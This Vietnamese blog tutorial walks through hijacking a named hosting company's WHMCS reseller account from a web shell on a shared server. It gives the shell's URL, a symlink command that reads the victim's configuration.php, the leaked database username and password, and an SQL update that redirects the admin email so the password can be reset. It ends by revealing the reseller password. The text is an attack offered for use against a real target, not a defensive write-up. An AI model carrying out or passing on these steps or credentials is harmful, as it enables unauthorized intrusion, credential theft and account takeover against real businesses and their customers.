J2TEAM Security: A must-have extension for Chrome users. Install now!

[TUT] - Chôm Reseller Hosting bằng local attack

Thấy mọi người coi thường shell server nước ngoài quá nên hum nay rảnh + đang sướng vì đục đc 7 con reseller nên làm cái tut này cho mọi người .

Phương pháp : Đục tường thần chưởng ( a.k.a local attack ) code WHMCS

Nguyện liệu :
- 1 con shell ( tất nhiên , ko thì local = cái niềm thương yêu à )
- reverse tool : tui dung code X share , http://b3pro.us/reverse
Bắt đầu vào công việc :
Bước 1 :
Đầu tiên ta reverse link shell để coi sv đấy có site bán host nào ko :”>
Con shell của tui là : http://96.30.11.108/~se0418b/egy.php
Reverse ta đc 1 đống , ta dung công cụ find của FF , find với từ khóa : host



Đây rồi , nhai em này nhá
_http://www.posiblehost.com
Để xem em này dung code gì nào



Hô hô , WHMCS , ngon rồi :”>
Bước 2 :
Local thôi chứ còn gì nữa , file chưa info data của code WHMCS này là configuration.php
Tiến hành symlink thôi , dễ ko hà
Find user nè :






Dùng lệnh : ln -s /home/posible/public_html/clientes/configuration.php a.txt



Xong roày , thử view file vừa symlink nào
Hê hê , đây roày



Bước 3 :
Connect database , điền info lúc nãy lấy đc vào con shell :”>
Ta có :
$db_username = “posible_posible”;
$db_password = “cdann123″;
$db_name = “posible_clientes”



Table chúng ta cần chú ý đến là : tbladmins <~ vâng , chính hắn
Đây là info user admin , cách quen thuộc , update pass admin



Câu lệnh : update tbladmins set email=”mail@anhlt.net” where id=”1″
Bụp chíu , xong roài , h vào admin panel của nó forgot pass
Link admin panel nè : http://www.posiblehost.com/clientes/admin/login.php
Forgot pass bằng cách nhấn vào dòng : “Forgotten your password? Click Here” ở dưới



Gửi về mail rồi nè



Login thôi chứ nhỉ
À khoan , các bạn chuyển qua IE nhá , vì sao à , ko thích nói có đc ko , bình tĩnh xem tiếp đi
Bước 4 :
Vào đc admincp của nó rồi nè



Các bạn làm theo ảnh ở dưới




Thấy gì hem
Đến lúc IE phát huy tác dụng roày
Ta dùng tool soi pass dưới dạng sao để soi pass của reseller ( FF dùng mấy cái này hem có tác dụng )


Xong roày
Có cái reseller chơi ngon ơ
– End tut –
Tut By LTA – Xgroupvn.org – Với sự xúi dục của X-Ecpanel
P/S : hàng hack hem dùng bền lâu đc nên chỉ dùng vào những việc ngắn hạn thôi nhá
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!